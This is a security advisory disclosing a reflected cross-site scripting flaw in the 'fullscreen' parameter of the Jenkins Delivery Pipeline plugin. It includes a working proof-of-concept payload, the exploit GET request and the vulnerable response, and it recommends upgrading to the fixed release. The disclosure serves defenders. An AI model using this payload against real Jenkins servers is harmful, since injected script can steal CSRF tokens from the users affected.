Technical Advisory: Reflected Cross-Site Scripting (XSS) vulnerability in Jenkins Delivery Pipeline plugin

Vendor: Jenkins Delivery Pipeline Plugin

Vendor URL: https://plugins.jenkins.io/delivery-pipeline-plugin

Versions affected: 1.0.7 (up to and including)

Systems Affected: Jenkins

Author: Viktor Gazdag viktor.gazdag[at]nccgroup[dot]trust

Advisory URL / CVE Identifier: https://jenkins.io/security/advisory/2017-11-16/

Risk: Medium - 6.1 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) (Reflected Cross-Site Scripting)

Summary

The Delivery Pipeline Plugin is a Jenkins plugin that helps visualize delivery/build pipelines. A parameter of the plugin is vulnerable to reflected cross-site scripting and, depending on the configuration, can allow authenticated or unauthenticated attackers to inject JavaScript code into the webpage.

Location

The ‘fullscreen’ parameter of the Delivery Pipeline Plugin's view was found to be vulnerable.

Impact

The vulnerability allows authenticated or unauthenticated (depending on the configuration) attackers to inject JavaScript code into the page; such code could, for example, extract and steal the CSRF token (the ‘crumb’) from the webpage.

Details

An example URL of the view is: http://hostname:8443/view/OMITTED-pipeline/?fullscreen=true
A basic payload that opens a popup window to demonstrate the issue is:

,1,1,false,null,30000,0,jsplumb);alert($('%23test'));pipelineutils.updatePipelines(pipelineContainers,%20"pipelineerror-",%20+%20pipelineid,%20view<

The following GET request and response show an example of how the vulnerability might be exploited:

GET /view/OMITTED-pipeline/?fullscreen=true,1,1,false,null,30000,0,jsplumb);alert($('%23test'));pipelineutils.updatePipelines(pipelineContainers,%20"pipelineerror-",%20+%20pipelineid,%20view HTTP/1.1
Host: xxx.xxx.xxx.xxx:8443
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: screenResolution=1920x1080; jenkins-timestamper-offset=-3600000; jenkins-timestamper=system; jenkins-timestamper-local=false; JSESSIONID.3dad5835=node0polduo6f03521qemnwxzxsuq71517.node0; screenResolution=1920x1080
Connection: close
Upgrade-Insecure-Requests: 1

In the response, the call to pipelineutils.updatePipelines() contains the submitted payload unescaped, so the injected alert() runs and shows a popup window:

HTTP/1.1 200 OK
Server: nginx/1.10.2
Date: Tue, 26 Sep 2017 16:51:28 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 15251
Connection: close
X-Content-Type-Options: nosniff
Expires: 0
Cache-Control: no-cache,no-store,must-revalidate
X-Hudson-Theme: default
X-Hudson: 1.395
X-Jenkins: 2.78
X-Jenkins-Session: e6f83b99
X-Frame-Options: sameorigin
X-Instance-Identity: MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAkMubT4QgTWD1/LNMG5xdhX7n5Gzw4NmUubl6lS21l4EWkTZt3CDn8loWsgv++j4avamvNbzV6AvKqf9SPWnSjwRFk0ndm5B8rV2wrxFiQqxx83TGiQ3m0Xj8+PYBX7Vo6WgvQ7CSm/fbVK4Pn9OsVeacQffh6bROrKjW1hXP/ycEvsjKLGkLvxyrz65qe6rP9sjvjkxxRO1Dr+hbQS2PjyOS4rlpqL0pQWHfHlnxu415G4N3Iqwqt0aFu7iYtAgwa1GMO9OKwgNqGCcq2NoOg1FmLfTNC96uD0f+y+wz6kjz6aMg0jcMm4OaC6/39QdbXSWCLzrjj6zSfdIxU+oQfwIDAQAB
X-Content-Type-Options: nosniff
X-Frame-Options: DENY

...OMITTED DATA...

"><div class="pipeline-loading-icon"></div></div><div style="width: 100.0%;" id="pipelines-1-0" class="left"></div><div class="clear"></div><script type="text/javascript">
function pipeline0(pipelineid, viewUrl) {

                                      var pipelineContainers = [];
                                      var jsplumb = jsPlumb.getInstance();
                                      jsPlumbUtilityVariable.push(jsplumb);

                                      pipelineContainers.push('pipelines-1-' + pipelineid);

                                      var view = { "viewUrl" : viewUrl };

                                      var pipelineutils = new pipelineUtils();

                                      pipelineutils.updatePipelines(pipelineContainers, "pipelineerror-" + pipelineid, view, true,1,1,false,null,30000,0,jsplumb);alert($('#test'));pipelineutils.updatePipelines(pipelineContainers, "pipelineerror-", pipelineid, view, 1, 1, false, null, 30000, 0, jsplumb);
                                     Q(window).resize(function () {
                                      jsplumb.repaintEverything();
                                      });
                                      }
                                      var jsPlumbUtilityVariable;
                                      Q(document).ready(function() {
                                               if ( undefined === jsPlumbUtilityVariable ) {
                                                     jsPlumbUtilityVariable = [];
                                               }
                                               var itpipeline0 = new
                                               pipeline0('0', 'view/OMITTED-pipeline/');
                                      });
                                </script></div></div></div></div><footer><div class="container-fluid"><div class="row"><div class="col-md-6" id="footer"></div><div class="col-md-18"><span class="page_generated">Page generated: Sep 26, 2017 5:51:28 PM BST</span><span class="rest_api"><a href="api/">REST API</a></span><span class="jenkins_ver"><a href="https://jenkins.io/">Jenkins ver. 2.78</a></span></div></div></div></footer></body></html>

Recommendation

Jenkins and the plugin developers have released a fixed version (1.0.8) of the plugin, which should be installed: https://repo.jenkins-ci.org/releases/se/diabol/jenkins/pipeline/delivery-pipeline-plugin/1.0.8/

Vendor Communication

2017-10-19 Advisory reported to Jenkins
2017-10-24 Acknowledgement from Jenkins core and plugin developers
2017-11-16 Patch released

Thanks to

Gabor Pilsits

About NCC Group

NCC Group is a global expert in cybersecurity and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape. With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate & respond to the risks they face. We are passionate about making the Internet safer and revolutionizing the way in which organizations think about cybersecurity.

Written by: Viktor Gazdag

Published date: 02 January 2018
